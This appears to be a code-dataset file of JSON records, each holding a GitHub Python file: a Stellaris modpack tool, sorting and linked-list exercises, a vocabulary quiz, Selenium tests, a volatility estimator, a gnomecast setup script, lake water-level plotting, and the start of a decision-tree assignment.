mod{os.sep}{modpack_name}{os.sep}duplicateFilesList.txt\")\n if conflicts_dict:\n # Output a list of conflicting files.\n with open(f\"mod{os.sep}{modpack_name}_conflicts!{os.sep}conflictingFilesList.txt\", \"w+\") as f:\n f.write(json.dumps(conflicts_dict, indent = 4))\n print(f\"Conflicting files listed in mod{os.sep}{modpack_name}_conflicts!{os.sep}conflictingFilesList.txt\")\n else:\n print(\"No conflicts!\")\n\n mod_descriptor_name = ''.join(char for char in modpack_name if char.isalnum()).capitalize()\n if not os.path.isfile(f\"mod{os.sep}{mod_descriptor_name}.mod\"):\n with open(f\"mod{os.sep}{mod_descriptor_name}.mod\", \"w+\") as f:\n f.writelines([f\"name=\\\"{modpack_name}\\\"\\n\", f\"path=\\\"mod/{modpack_name}\\\"\\n\", \"tags={\\n\", \"\\t\\\"Gameplay\\\"\\n\", \"}\\n\", \"supported_version=\\\"2.7.*\\\"\\n\"])\n\n if patch_created:\n print(\"A modpack patch was created in order to preserve the customizations in the modpack folder.\")\n print(f\"To revert the customizations to your modpack, add {patch_name} to your whitelist (at the top if you want to ensure your customizations are prioritized).\")\n print(\"Done!\")\n\n\ndef get_name_from_cl():\n parser = ArgumentParser()\n parser.add_argument('-n', '--modpack_name', default=\"! modpack\", type=str,\n help='The name of the modpack (both the folder name and the name in the stellaris launcher).')\n parser.add_argument('-ovr', '--nopatch', action='store_true', default=True,\n help=\"Add this argument to overwrite files in the mod folder without generating a patch. By default, \" \\\n \"modifications within the *modpack_name* folder will be saved to a new mod called *modpack_name*_patch\")\n args = parser.parse_args()\n return args.modpack_name, args.nopatch\n\n\nif __name__ == \"__main__\":\n modpack_name, overwrite = get_name_from_cl()\n print(overwrite)\n make_modpack(modpack_name, overwrite)\n","repo_name":"D4rkstalker/StellarisModpackUtility","sub_path":"old_installer.py","file_name":"old_installer.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"16099654869","text":"def selection_sort_smallest(arr):\n new_array = []\n\n for i in range(len(arr)):\n smallest = find_smallest(arr)\n new_array.append(arr.pop(smallest))\n\n return new_array\n\ndef find_smallest(arr):\n smallest = arr[0]\n smallest_index = 0\n\n for i in range(1, len(arr)):\n if arr[i] < smallest:\n smallest = arr[i]\n smallest_index = i\n\n return smallest_index\n\nif __name__ == \"__main__\":\n unordered_array = [5, 3, 6, 2, 10]\n print(\"Unordered List:\")\n print(unordered_array)\n\n sorted_smallest = selection_sort_smallest(unordered_array)\n\n print(\"Sorted List By Smallest:\")\n print(sorted_smallest)\n","repo_name":"jcornejo86/algorithms","sub_path":"algorithms/python/02_selection_sort/example_02.py","file_name":"example_02.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34107523621","text":"import sqlite3\nimport random\nfrom tkinter import Label, Button, messagebox, Entry\nfrom .status_buttons import add_buttons\nfrom crs.enums.global_enums import ButtonNames, Titles, InfoMessages\n\n\nclass WellKnownWord():\n def __init__(self, from_lang=0, to_lang=1):\n self.word_list = []\n self.from_lang = from_lang\n self.to_lang = to_lang\n\n def translate(self, frame, word_id, new_list):\n ''' очистка формы и закрепление на ней элементов\n для упражнения по переводу '''\n for widget in frame.winfo_children():\n widget.destroy()\n word = self.get_word(word_id, new_list)\n Label(\n frame, text=str(word_id) + '.' + word[self.from_lang], width=30\n ).grid(row=1, column=0)\n trans = Entry(frame, width=30)\n trans.grid(row=1, column=1)\n Button(\n frame, text=ButtonNames.CHECK.value,\n command=lambda: self.check_trans(\n frame, word_id, trans.get()\n )\n ).grid(row=2, column=0, columnspan=2)\n add_buttons(frame, word)\n\n def get_word(self, word_id, new_list):\n ''' получение слова из списка '''\n word_id = word_id % 15\n if new_list:\n with sqlite3.connect('vocabulary.db') as conn:\n cursor = conn.cursor()\n word_list = cursor.execute(\n ''' Select english, russian, id FROM words_word WHERE\n is_well_known = :is_well_known ''',\n {'is_well_known': True}\n ).fetchall()\n if not word_list:\n messagebox.showinfo(\n title=Titles.OOPS.value,\n message=InfoMessages.NOT_FOUND.value\n )\n return\n random.shuffle(word_list)\n self.word_list = word_list[:15]\n if len(self.word_list) < word_id:\n return self.word_list[0]\n return self.word_list[word_id]\n\n def check_trans(self, frame, word_id, trans):\n ''' проверка перевода '''\n word_id = word_id % 15\n word = self.word_list[word_id]\n if trans not in word[self.to_lang]:\n messagebox.showinfo(\n title=Titles.ERROR.value,\n message=word[self.from_lang] + ' - ' + word[self.to_lang]\n )\n self.translate(frame, int(word_id)+1, False)\n","repo_name":"sergey87kuzin/vocabulary_gui","sub_path":"exersizes/eng_to_rus.py","file_name":"eng_to_rus.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15919793314","text":"from src.common.Pages import DataStorePage, HomePage\nfrom src.common.common import BrowserTestCase\nfrom src.data.TestData import TestData\nfrom src.data.Locators import Locators\n\n\nclass DataStoreTest(BrowserTestCase):\n def test__cookies_consent(self):\n \"\"\" Clicks on cookies consent button on Climate Data Store\n \"\"\"\n self.data_store_page = DataStorePage(self.driver)\n cookies_button = self.data_store_page.click(\n Locators.DATA_COOKIES_CONSENT)\n self.assertTrue(cookies_button, 'Cookies consent button click failed')\n\n def test_access_the_catalogue(self):\n \"\"\" Search in the Climate Data Store\n \"\"\"\n self.data_store_page = HomePage(self.driver, self.url)\n self.data_store_page.click(Locators.DATA_LINK)\n data_search_input = self.data_store_page.is_enabled(\n Locators.DATA_SEARCH_INPUT)\n data_search_input.send_keys(TestData.DS_SEARCH_TEXT)\n data_search_submit = self.data_store_page.is_enabled(\n Locators.DATA_SEARCH_SUBMIT)\n data_search_submit.click()\n self.data_store_page.wait_title(TestData.SEARCH_DS_TITLE)\n self.assertIn(TestData.SEARCH_DS_TITLE, self.data_store_page.driver.title)\n","repo_name":"IulianStave/climate_py_selenium","sub_path":"src/DataStoreTestCase.py","file_name":"DataStoreTestCase.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11987182866","text":"import numpy as np\n\nfrom django.utils import timezone\nfrom datetime import datetime, timezone, timedelta\n\nfrom okx_app.model.model_candle import ModelCandle\nfrom okx_app.model.model_currency import ModelCurrency\nfrom okx_app.model.model_exchange import ModelExchange\n\nfrom okx_app.services.volatility_historical.service_volatility_historical_estimator_interface import ServiceVolatilityHistoricalEstimatorInterface\n\n ##############################################\n # Service Calculates Vol of Vol from Candles #\n ##############################################\n\n\nclass ServiceVolatilityHistoricalVvolEstimator(ServiceVolatilityHistoricalEstimatorInterface):\n\n def __init__(self) -> None:\n super(ServiceVolatilityHistoricalVvolEstimator, self).__init__()\n \n def estimate(self, \n instrument_term: int,\n exchange: ModelExchange,\n base_ccy: ModelCurrency, \n quote_ccy: ModelCurrency, \n window: int,\n **kwargs\n ):\n\n to_date = datetime.now(timezone.utc)\n to_date_minute = to_date.replace(second=0, microsecond=0, minute=to_date.minute)\n from_date_minute = to_date_minute - timedelta(minutes=window*2)\n candles = list(ModelCandle.objects.filter(\n exchange=exchange,\n base_ccy=base_ccy,\n quote_ccy=quote_ccy,\n date__gte=from_date_minute\n ).order_by('-date'))\n \n \n ##calculate logog returns of all candles in last 7 days (candles-1)\n returns = []\n for i in range(1, len(candles), 1):\n returns.append(np.log(candles[i].close/candles[i-1].close))\n\n ## calculate hvol over each instrument_term period in returns eg. every non-overlapping 12h(720) period in 7 days (10080) \n start= 0\n dynamic_end = 0\n end = int(window)\n\n response_list = []\n dynamic_start = max(start, dynamic_end) \n dynamic_end = max(start+int(instrument_term)*60, start)\n while end > dynamic_end:\n try:\n period_returns = returns[dynamic_start:dynamic_end]\n standard_dev = np.std(period_returns)\n periodic_annualised_vol = standard_dev*((525600)**0.5)\n response_list.append(periodic_annualised_vol)\n\n except returns == None:\n print(\"no returns\")\n if start == int(end):\n break\n dynamic_start = max(start, dynamic_start+int(instrument_term)*60)\n dynamic_end = min(end, dynamic_start+int(instrument_term)*60)\n\n vvol = np.std(response_list)\n return vvol","repo_name":"ChanrajMandok/okx_valuation","sub_path":"okx_app/services/volatility_historical/service_volatility_historical_vvol_estimator.py","file_name":"service_volatility_historical_vvol_estimator.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70553975944","text":"#write a node and linked list constructor\n#Add append method to the linked list\n\nclass Node:\n def __init__(self,value):\n self.value = value\n self.next = None\n\nclass LinkedList:\n def __init__(self,value):\n new_node =Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n def append(self,value):\n new_node =Node(value)\n # if the list is not created or empty\n if self.head == None:\n self.head = new_node\n self.tail = new_node\n else:\n # If there is a tail element from the list\n #point the tail node to the new node\n self.tail.next = new_node\n #move the tail to the new node\n self.tail =new_node\n #increase the length of the linked list\n self.length += 1\n \n \n \n\n","repo_name":"it-AVNG/DataEngineer","sub_path":"LinkedList_Execercise/excercise2.py","file_name":"excercise2.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26858713368","text":"import requests\n\ndef fetch_top_holdings():\n url = \"https://query1.finance.yahoo.com/v1/finance/quote\"\n params = {\n 'symbols': 'SPY',\n 'fields': 'topHoldings'\n }\n response = requests.get(url, params=params)\n data = response.json()\n if 'quoteResponse' in data and 'result' in data['quoteResponse']:\n result = data['quoteResponse']['result']\n if len(result) > 0 and 'topHoldings' in result[0]:\n holdings = result[0]['topHoldings']['holding']\n return holdings\n return []\n\ntop_holdings = fetch_top_holdings()\nprint(top_holdings)\n\n","repo_name":"8Bit3DPrints/TheGoodStuff","sub_path":"holdings.py","file_name":"holdings.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24110372567","text":"import os\n\nfrom setuptools import setup\n\ndef long_description():\n os.system('pandoc --from=markdown --to=rst --output=README.rst README.md')\n readme_fn = os.path.join(os.path.dirname(__file__), 'README.rst')\n if os.path.exists(readme_fn):\n with open(readme_fn) as f:\n return f.read()\n else:\n return 'not available'\n\nsetup(\n name='gnomecast',\n version=__import__('gnomecast').__version__,\n description='A native Linux GUI for Chromecasting local files.',\n long_description=long_description(),\n author='Derek Anderson',\n author_email='public@kered.org',\n url='https://github.com/keredson/gnomecast',\n py_modules=['gnomecast'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: End Users/Desktop',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n install_requires=['pychromecast','bottle','pycaption','paste','html5lib'],\n data_files=[\n ('share/icons/hicolor/16x16/apps', ['icons/gnomecast_16.png']),\n ('share/icons/hicolor/48x48/apps', ['icons/gnomecast_48.png']),\n ('share/icons/hicolor/scalable/apps', ['icons/gnomecast.svg']),\n ('share/applications', ['gnomecast.desktop'])\n ],\n entry_points={\n 'gui_scripts': [\n 'gnomecast = gnomecast:main',\n ]\n }\n)\n\n\n","repo_name":"keredson/gnomecast","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1418,"dataset":"github-code","pt":"81"} +{"seq_id":"73388353866","text":"# Letter Combinations of a Phone Number\nfrom typing import List\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n if not digits: return []\n d = {'2': ['a','b','c'],\n '3': ['d','e','f'],\n '4': ['g','h','i'],\n '5': ['j','k','l'],\n '6': ['m','n','o'],\n '7': ['p','q','r','s'],\n '8': ['t','u','v'],\n '9': ['w','x','y','z'],}\n s1 = ['']\n s2 = []\n def put(f: List[List[str]], t: List[List[str]], l: List[str]):\n while f:\n tmp = f.pop()\n for c in l:\n tmp2 = list(tmp)\n tmp2.append(c)\n t.append(tmp2)\n return\n for digit in digits:\n if s1: put(s1, s2, d[digit])\n else: put(s2, s1, d[digit])\n if s1:\n s1 = [\"\".join(x) for x in s1]\n return s1\n else:\n s2 = [\"\".join(x) for x in s2]\n return s2\n\n\n\ns = Solution()\nprint(s.letterCombinations(\"2\"))","repo_name":"GavinPHR/code","sub_path":"phase3/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"42794762949","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sklearn as sk\nimport matplotlib\nimport cartopy.crs as ccrs # Projections\nimport cartopy.feature as cfeature\nimport cartopy\nimport datetime\nimport matplotlib.font_manager as fm\n\n# This file generates the plots we used in our presentation. It is outlined as follows:\n# - Read in the Sentinel A data for Lake Winnipeg\n# - Figure 1: Sentinel A ground tracks over Lake Winnipeg\n# - Figure 2: Outlier rejection (reject points +/- 2*sigma from the mean)\n# - Figure 3: Mean lake water levels on each day\n# - Figure 4: Kalman filtered lake water levels; superimposed on median lake water levels\n# - Figure 5: Neural network prediced lake water levels; superimposed on median lake water levels and in-situ data\n# Uses both Sentinel A and Sentinel B data\n\n# Constants for plotting\nFIG_WIDTH_INCHES = 6.5\nFIG_HEIGHT_INCHES = 6.5\nTITLE_SIZE = 15\nTICK_LABEL_SIZE = 14\nLABEL_SIZE = 14\nTEXT_COLOUR=\"w\"\n\n# Read Sentinel A Lake Winnipeg data\nsentinel_data_A = pd.read_csv(\"data/Sentinel_3A_water_level_Version0.csv\")\nsentinel_data_A = sentinel_data_A.rename(\n columns={\n \"Date (YYYYMMDD)\" : \"date\",\n \"Lake_name\" : \"lake_name\",\n \"Latitude\" : \"latitude\",\n \"Longitude\" : \"longitude\",\n \"Relaive_orbit\" : \"relative_orbit\",\n \"Lake water level (m)\" : \"lake_water_level\"\n }\n)\nlake_winnipeg = sentinel_data_A[\n sentinel_data_A[\"lake_name\"] == \"Winnipeg\"\n]\n\n####\n#### FIGURE 1: Sentinel A ground tracks over Lake Winnipeg\n####\n# Get the extent from the data\nextent = [\n lake_winnipeg[\"longitude\"].min(),\n lake_winnipeg[\"longitude\"].max(),\n lake_winnipeg[\"latitude\"].min(),\n lake_winnipeg[\"latitude\"].max(),\n]\ncentral_lon = np.mean(extent[:2])\ncentral_lat = np.mean(extent[2:])\n\n# High resolution lakes\nlakes_50m = cfeature.NaturalEarthFeature('physical', 'lakes', '10m')\n\n# Land, river, and lakes\nfig = plt.figure(figsize=(6.5, 6.6))\nax = fig.add_subplot(111, projection=ccrs.PlateCarree())\nax.set_extent(extent)\nax.add_feature(cartopy.feature.LAND, edgecolor='black')\nax.add_feature(cartopy.feature.RIVERS)\nax.add_feature(lakes_50m, facecolor='lightsteelblue',edgecolor='black')\n\n# Plot altimetry points\nax.scatter(\n x=np.array(lake_winnipeg[\"longitude\"]),\n y=np.array(lake_winnipeg[\"latitude\"]),\n zorder=10,\n s=1\n)\n\n# Set plotting stuff.\nplt.title(\n \"Sentinel A ground tracks over Lake Winnipeg\",\n fontsize=TITLE_SIZE,\n pad=20,\n color=TEXT_COLOUR\n)\nax.text(-0.22, 0.55, 'Latitude (degrees)', va='bottom', ha='center',\n rotation='vertical', rotation_mode='anchor',\n transform=ax.transAxes, fontsize=LABEL_SIZE, color=TEXT_COLOUR)\nax.text(0.5, -0.15, 'Longitude (degrees)', va='bottom', ha='center',\n rotation='horizontal', rotation_mode='anchor',\n transform=ax.transAxes, fontsize=LABEL_SIZE, color=TEXT_COLOUR)\n\n# Format gridlines\n# https://scitools.org.uk/cartopy/docs/latest/gallery/gridlines_and_labels/gridliner.html\ngl = ax.gridlines(draw_labels=True)\ngl.top_labels = False\ngl.right_labels = False\ngl.xlabel_style = {'size': TICK_LABEL_SIZE, 'color': TEXT_COLOUR}\ngl.ylabel_style = {'size': TICK_LABEL_SIZE, 'color': TEXT_COLOUR}\n\nplt.tight_layout()\nfig.savefig(\n './out/sentinel_a_ground_track.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n####\n#### Figure 2: Outlier Rejection\n####\nlake_water_mean = lake_winnipeg[\"lake_water_level\"].mean()\nlake_water_std = lake_winnipeg[\"lake_water_level\"].std()\n\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\n\n# Plot histogram of the lake water levels\nax.hist(\n x=lake_winnipeg[\"lake_water_level\"],\n bins=np.linspace(\n lake_water_mean - 5 * lake_water_std,\n lake_water_mean + 5 * lake_water_std,\n 500\n )\n)\nax.set_xlim(\n [\n lake_water_mean - 7 * lake_water_std,\n lake_water_mean + 7 * lake_water_std,\n ]\n)\n\n# Set shaded red areas, indicating what to exlude\nax.axvspan(\n xmin=ax.get_xlim()[0],\n xmax=lake_water_mean - 2 * lake_water_std,\n facecolor=\"#F02D3A\",\n alpha=0.5\n)\nax.axvspan(\n xmin=lake_water_mean + 2 * lake_water_std,\n xmax=ax.get_xlim()[1],\n facecolor=\"#F02D3A\",\n alpha=0.5\n)\n\n# Add vertical lines at each standard deviation\nvline_water_levels = [lake_water_mean + i * lake_water_std for i in range(-2,3)]\nax.set_ylim([0, 2000.])\nax.vlines(\n x=vline_water_levels,\n ymin=0., \n ymax=2000., # hard code in 2000. here; setting ymax=ax.get_ylim()[1] isn't working properly\n color='k',\n linestyle='--',\n alpha=0.5\n)\n\n# Add thousands separator to y-axis\nax.get_yaxis().set_major_formatter(\n matplotlib.ticker.FuncFormatter(lambda x, p: format(int(x), ','))\n)\n\nax.set_xlabel(\n \"Water level (m)\",\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE,\n labelpad=20\n)\nax.set_ylabel(\n \"Number of data points\",\n fontsize=LABEL_SIZE,\n labelpad=20,\n color=TEXT_COLOUR\n)\n\n# Add upper x-axis showing mu and +/- N standard deviations\nax1 = ax.twiny()\nax1.set_xlim(\n ax.get_xlim()\n)\nax1.set_xticks(\n [lake_water_mean + i * lake_water_std for i in range(-2, 3)]\n)\nax1.set_xticklabels(\n [\n r'-2$\\sigma$',\n r'-1$\\sigma$',\n r'$\\mu$',\n r'1$\\sigma$',\n r'2$\\sigma$',\n ],\n fontsize=TICK_LABEL_SIZE,\n color=TEXT_COLOUR\n)\n\n# Set all x/y-ticks to have the right size and colour\nfor x in ax.get_xticklabels():\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(TEXT_COLOUR)\nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(TEXT_COLOUR)\n\n# Add label saying to ignore the shaded red-ares \nax.text(210, 1500, 'Ignore water\\n' + r'levels of $\\mu \\pm2\\sigma$' + '\\n(shaded)', color=TEXT_COLOUR, fontsize=13)\n\n# Set the colour of the axes\nax1.spines[\"top\"].set_color(TEXT_COLOUR)\nax1.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax1.spines[\"left\"].set_color(TEXT_COLOUR)\nax1.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nax1.tick_params(axis='x', colors=TEXT_COLOUR)\n\nplt.title(\n \"Distribution of lake water levels\\nin Lake Winnipeg from Sentinel A\",\n fontsize=TITLE_SIZE,\n pad=20,\n color=TEXT_COLOUR\n)\nplt.tight_layout()\nfig.savefig(\n './out/outlier_rejection.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n####\n#### Figure 3: Mean lake water levels on each day\n####\n# Read in the processed data; reuse the lake_winnipeg name for the data frame\nlake_winnipeg = pd.read_csv(\"./processed/sentinel_a_lake_winnipeg_remove_outliers.csv\")\n\n# Reject outliers\nlake_winnipeg = lake_winnipeg.loc[\n lake_winnipeg[\"reject\"] == False\n]\n\nbaseline_results = lake_winnipeg[\n [\n \"date\",\n \"lake_water_level\"\n ]\n].groupby(\"date\").agg(\n {\n \"lake_water_level\" : \"median\"\n }\n).reset_index()\nbaseline_results.loc[:, \"date_as_datetime\"] = pd.to_datetime(baseline_results.loc[:, \"date\"], format=\"%Y%m%d\")\n\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nax.plot(\n baseline_results[\"date_as_datetime\"],\n baseline_results[\"lake_water_level\"],\n linewidth=1.0,\n label=\"Median of each track\",\n color=\"#F55536\"\n)\nax.set_xlabel(\n 'Date',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE\n)\nax.set_ylabel(\n 'Lake Winnipeg water levels (m)',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE\n)\nplt.title(\n \"Median of lake water levels on each day\\nin Lake Winnipeg (Sentinel A)\",\n fontsize=TITLE_SIZE,\n color=TEXT_COLOUR,\n pad=20\n)\nlocator = matplotlib.dates.MonthLocator((1, 7))\nfmt = matplotlib.dates.DateFormatter('%b-%Y')\nax.xaxis.set_major_locator(locator)\nax.xaxis.set_major_formatter(fmt)\nfor x in ax.get_xticklabels():\n x.set_rotation(45)\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(TEXT_COLOUR)\n\nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(TEXT_COLOUR)\n\n# Set the colour of the axes\nax.spines[\"top\"].set_color(TEXT_COLOUR)\nax.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax.spines[\"left\"].set_color(TEXT_COLOUR)\nax.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nplt.tight_layout()\nfig.savefig(\n './out/median.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n#####\n##### Figure 4: Kalman filtered lake water levels; overlaid on median (figure 3) levels\n#####\n# Just read in the results; don't repeat processing here.\nkalman_filtered = pd.read_csv(\"./processed/sentinel_a_lake_winnipeg_kalman_filtered.csv\")\n\n# Plot just the median\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nax.plot(\n baseline_results[\"date_as_datetime\"],\n baseline_results[\"lake_water_level\"],\n linewidth=1.0,\n label=\"Median of each track\",\n alpha=0.5,\n color = \"#F55536\"\n)\nax.plot(\n pd.to_datetime(kalman_filtered[\"date\"], format=\"%Y%m%d\"),\n kalman_filtered[\"kalman_filtered_lake_water_levels\"],\n zorder=10,\n label=\"Kalman Filtered\",\n alpha=0.85,\n color=\"#6BAB90\"\n)\nax.set_xlabel(\n 'Date',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE,\n)\nax.set_ylabel(\n 'Lake Winnipeg water levels (m)',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE\n)\nplt.title(\n \"Median and Kalman filtered lake water levels on each day\\nin Lake Winnipeg (Sentinel A)\",\n fontsize=TITLE_SIZE,\n color=TEXT_COLOUR,\n pad=20\n)\nlocator = matplotlib.dates.MonthLocator((1, 7))\nfmt = matplotlib.dates.DateFormatter('%b-%Y')\nax.xaxis.set_major_locator(locator)\nax.xaxis.set_major_formatter(fmt)\nfor x in ax.get_xticklabels():\n x.set_rotation(45)\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(TEXT_COLOUR)\n\nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(TEXT_COLOUR)\n\nax.legend(\n)\n# Set the colour of the axes\nax.spines[\"top\"].set_color(TEXT_COLOUR)\nax.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax.spines[\"left\"].set_color(TEXT_COLOUR)\nax.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nplt.tight_layout()\nfig.savefig(\n './out/kalman.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n####\n#### Figure 5: Neural network lake water levels\n####\n# Read in the data used to make the neural network figure\nlake_winnipeg_nn = pd.read_csv(\"./processed/sentinel_a_b_lake_winnipeg_neural_network.csv\")\nfig = plt.figure(\n figsize=(6, 6)\n)\nax = fig.add_subplot(111)\n# Artificially split the time series into a train/test part\n# Plot in-situ\nax.plot(\n pd.to_datetime(lake_winnipeg_nn[\"date\"], format=\"%Y-%m-%d\"),\n lake_winnipeg_nn[\"in_situ_lake_water_level\"],\n color=\"#16E0BD\",\n linestyle=\"-.\",\n linewidth=1.0,\n label=\"In-situ lake water levels\",\n alpha=0.9\n)\n\n# Plot median of lake water levels\nax.plot(\n pd.to_datetime(lake_winnipeg_nn[\"date\"], format=\"%Y-%m-%d\"),\n lake_winnipeg_nn[\"lake_water_level\"],\n linestyle=\"-\",\n linewidth=1.0,\n color=\"#F55536\",\n alpha=0.5,\n label=\"Sentinel A/B lake water levels (median)\"\n)\n\n\nax.plot(\n pd.to_datetime(lake_winnipeg_nn[\"date\"], format=\"%Y-%m-%d\"),\n lake_winnipeg_nn[\"lake_water_levels_nn\"], \n color=\"#586A6A\", # Deep space sparkle\n linestyle=\"--\",\n linewidth=1.0,\n alpha=0.9,\n label=\"Neural Network\"\n)\n\nlocator = matplotlib.dates.MonthLocator((1, 7))\nfmt = matplotlib.dates.DateFormatter('%b-%Y')\nax.xaxis.set_major_locator(locator)\nax.xaxis.set_major_formatter(fmt)\nfor x in ax.get_xticklabels():\n x.set_rotation(45)\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(\"w\")\n \nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(\"w\")\nax.legend()\nax.set_xlabel(\n \"Date\",\n labelpad=20,\n fontsize=LABEL_SIZE,\n color=TEXT_COLOUR\n)\nax.set_ylabel(\n \"Lake Water Level (m)\",\n labelpad=20,\n fontsize=LABEL_SIZE,\n color=TEXT_COLOUR\n)\nax.spines[\"top\"].set_color(TEXT_COLOUR)\nax.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax.spines[\"left\"].set_color(TEXT_COLOUR)\nax.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nplt.title(\n \"Lake Winnipeg water levels: in-situ, median,\\n and neural network\",\n pad=20,\n fontsize=TITLE_SIZE,\n color=TEXT_COLOUR\n)\nplt.tight_layout()\nfig.savefig(\n './out/neural_network.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)","repo_name":"pvasudev16/ml-freshwater-management","sub_path":"figures_for_presentation.py","file_name":"figures_for_presentation.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11526708665","text":"import math\nimport numpy as np\nfrom collections import Counter\n# Note: please don't add any new package, you should solve this problem using only the packages above.\n# However, importing the Python standard library is allowed: https://docs.python.org/3/library/\n#-------------------------------------------------------------------------\n'''\n Part 1: Decision Tree (with Discrete Attributes) -- 60 points --\n In this problem, you will implement the decision tree method for classification problems.\n You could test the correctness of your code by typing `nosetests -v test1.py` in the terminal.\n'''\n \n#-----------------------------------------------\nclass Node:\n '''\n Decision Tree Node (with discrete attributes)\n Inputs: \n X: the data instances in the node, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n i: the index of the attribute being tested in the node, an integer scalar \n C: the dictionary of attribute values and children nodes. \n Each (key, value) pair represents an attribute value and its corresponding child node.\n isleaf: whether or not this node is a leaf node, a boolean scalar\n p: the label to be predicted on the node (i.e., most common label in the node).\n '''\n def __init__(self,X,Y, i=None,C=None, isleaf= False,p=None):\n self.X = X\n self.Y = Y\n self.i = i\n self.C= C\n self.isleaf = isleaf\n self.p = p\n\n#-----------------------------------------------\nclass Tree(object):\n '''\n Decision Tree (with discrete attributes). \n We are using ID3(Iterative Dichotomiser 3) algorithm. So this decision tree is also called ID3.\n '''\n #--------------------------\n @staticmethod\n def entropy(Y):\n '''\n Compute the entropy of a list of values.\n Input:\n Y: a list of values, a numpy array of int/float/string values.\n Output:\n e: the entropy of the list of values, a float scalar\n Hint: you could use collections.Counter.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n c=Counter(Y)\n total=len(Y)\n sumEntropy=0\n for key in c.keys():\n val=c.get(key)\n sumEntropy-=val/total*math.log2(val/total)\n e=sumEntropy\n #########################################\n return e \n \n \n \n #--------------------------\n @staticmethod\n def conditional_entropy(Y,X):\n '''\n Compute the conditional entropy of y given x. The conditional entropy H(Y|X) means average entropy of children nodes, given attribute X. Refer to \n\n Input:\n X: a list of values , a numpy array of int/float/string values. The size of the array means the number of instances/examples. X contains each instance's attribute value. \n Y: a list of values, a numpy array of int/float/string values. Y contains each instance's corresponding target label. For example X[0]'s target label is Y[0]\n Output:\n ce: the conditional entropy of y given x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n cX=Counter(X)\n xY=Counter(Y)\n keyBlackList=[]\n sumEntropy=0\n for i in range(len(Y)):\n #Finds a key that isnt already accounted for\n key=X[i]\n if key in keyBlackList:\n continue\n keyBlackList.append(key)\n labelList=[]\n #Finds all other occurences of the key\n for j in range(len(Y)):\n if(X[j]==key):\n labelList.append(Y[j])\n #Reduces Entropy by fraction of the sample in that split\n 